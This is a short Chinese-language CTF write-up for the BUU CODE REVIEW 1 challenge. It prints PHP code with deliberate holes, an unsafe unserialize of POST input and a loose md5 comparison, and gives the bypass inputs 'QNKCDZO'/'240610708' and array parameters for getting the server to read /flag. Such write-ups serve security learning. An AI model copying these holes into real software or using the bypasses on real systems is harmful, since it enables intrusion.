CTF程式碼審計之BUU CODE REVIEW 1
阿新 • • 發佈:2020-09-08
BUU CODE REVIEW 1
考點知識:反序列化,md5繞過
魔術方法 __destruct(): 物件的所有引用都被刪除或者當物件被顯式銷燬時執行
題目:
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() {try { $this->correct = base64_encode(uniqid()); if($this->correct === $this->input) { echo file_get_contents("/flag"); } } catch (Exception $e) { } } } if($_GET['pleaseget'] === '1') { if($_POST['pleasepost'] === '2') {if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) { unserialize($_POST['obj']); } } }
解決:
一、構造序列化
輸出結果得到flag
注:此處可用md51=QNKCDZO&md52=240610708(弱型別)或者 md5[]=1&md52[]=2(陣列)